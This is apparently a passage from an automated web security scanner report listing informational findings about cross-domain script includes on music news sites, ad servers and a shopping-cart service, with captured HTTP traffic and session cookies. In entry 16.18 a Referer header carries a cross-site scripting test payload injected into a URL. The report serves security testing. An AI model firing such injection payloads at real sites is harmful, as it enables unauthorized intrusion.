GET /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!; C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 14:00:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.884214.743832.0XMC
Set-Cookie: F1=Bg28H3kAAAAAYm1CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: ROLL=boAno2CkdKAgj1G!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: 29047542=_4dc7f368,4264037248,743832^884214^81^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 14:00:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000743832/mnum=0000884214/cstr=29047542=_4dc7f368,4264037248,743832^884214^81^0,1_/xsxdata=$xsxdata/bnum=29047542/optn=64?trg=;ord=4264037248?">');document.write('<\/SCRIPT>
...[SNIP]...
16.10. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.nme.com
Path:   /themes/default/static_images//themes/default/images/footer_bkgrd.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /themes/default/static_images//themes/default/images/footer_bkgrd.gif HTTP/1.1
Host: static.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Wed, 13 Apr 2011 14:52:18 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 3553292c29d61be30dade092df8597046390d4ea"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3640"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014481544494629"]|
X-Wf-1-1-1-10: 23|[{"Type":"LOG"},"ct: "]|
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=345007, post-check=0, pre-check=0
Expires: Fri, 13 May 2011 13:52:24 GMT
Date: Mon, 09 May 2011 14:02:17 GMT
Connection: close
Content-Length: 41093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<link href="http://static.nme.com/combined/common/db72101de5d0d948cfe0daf3fbe57d92.print.css" rel="stylesheet" type="text/css" media="print" />

<script type="text/javascript" language="JavaScript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
<!-- Google search box overlays -->
<script type="text/javascript" src="http://www.google.co.uk/cse/brand?form=header-search-box&amp;lang=en"></script>
<script type="text/javascript" src="http://www.google.co.uk/cse/brand?form=footer-search-box&amp;lang=en"></script>
...[SNIP]...
16.11. http://tag.contextweb.com/TagPublish/getad.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2555
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:02 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:02 GMT; path=/
Set-Cookie: 536156_4_101378=1304949602182; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524833886248|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:02 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...
16.12. http://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cgi-local/cart.cgi?2akrshop2_AKR074VINYL HTTP/1.1
Host: www.ccnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.5.10.1304949980; oudelay=1304950305; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206;

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:25 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950348; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:12:28 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75AC132BC7478C7307DEBD3D97FA4A6E72CA22BF32FAF94F13; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:12:28 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
16.13. http://www.ccnow.com/cgi-local/sc_cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cgi-local/sc_cart.cgi?8147444662139294 HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:30 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950050; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
16.14. https://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/ HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:44 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950065; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:45 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75D81F41DED68942DF4467139B51A38206; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:07:45 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
16.15. https://www.ccnow.com/cgi-local/checkout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /cgi-local/checkout.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980
Content-Length: 287

action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Productio
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:52 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950072; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:52 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18997

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
16.16. https://www.ccnow.com/cgi-local/sc_cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /cgi-local/sc_cart.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980
Content-Length: 365

seq1_asmakit_pid=AKR214&seq1_asmakit_quan=1&coupon_asmakit=&shipreg_asmakit=BC%3AUS&action=update&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=ZZ&cids=asmakit
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:50 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950070; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:50 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
16.17. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://disqus.com/forums/clash/embed.js'></script>
...[SNIP]...
<!-- End Quantcast tag -->

<script src="http://static.getclicky.com/68525.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
16.18. http://www.clashmusic.com/user/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/a HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:13:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:13:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->

<script src="http://static.getclicky.com/68525.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
16.19. http://www.clashmusic.com/user/password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/password HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:20 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->

<script src="http://static.getclicky.com/68525.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
16.20. http://www.clashmusic.com/user/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/register HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:09 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:07:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
